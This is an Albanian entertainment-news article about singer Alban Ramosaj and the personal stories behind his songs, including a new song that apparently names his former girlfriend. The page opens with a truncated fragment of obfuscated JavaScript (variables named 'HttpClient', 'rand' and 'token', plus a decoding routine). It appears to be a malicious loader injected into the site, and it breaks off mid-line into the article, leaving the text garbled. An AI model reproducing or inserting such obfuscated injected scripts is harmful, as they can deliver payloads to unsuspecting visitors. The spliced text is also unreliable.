;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Alban Ramosaj do zbuloj emrin e ish të dashurës në këngën e re!

By

Emri i tij u bë familjar për mediet dhe publikun pas pjesëmarrjes në një nga spektaklet e talenteve në Shqipëri. Aq më tepër kur ai bën pjesë në një familje të mbushur me artistë.

Pavarësisht se mund të debuntonte në treg me bashkëpunim me Albërinë, Argjentinën ose Beatrixin, Alban Ramosaj vendosi që rrugën e tij në muzikë ta nis vetëm.

“Çkemi” ishte kënga debutuese e tij e më pas pauzoi. Rikthimi me këngën e dytë ishte më i bujshëm. “A më do” për shumë javë ishte e para në top lista televizive e ato radiofonike.

Të dyja projektet e para e sidomos ‘A më do’ është e bazuar në një histori personale të Albanit. Por rrëfimi që Ramosaj ka vendosur ta bëj përmes muzikës nuk përfundon me kaq. ‘Pikën’ do t’ia vë me projektin e tretë ku këtë herë përmendet dhe emri.

Materialin ku këngëtari shpalos detaje për dedikimet, relacionet me të dashurin e motrës por edhe në lidhje me ekspozimin e trupit të tij e gjeni në videon e mëposhtme.

Artikuj të ngjashëm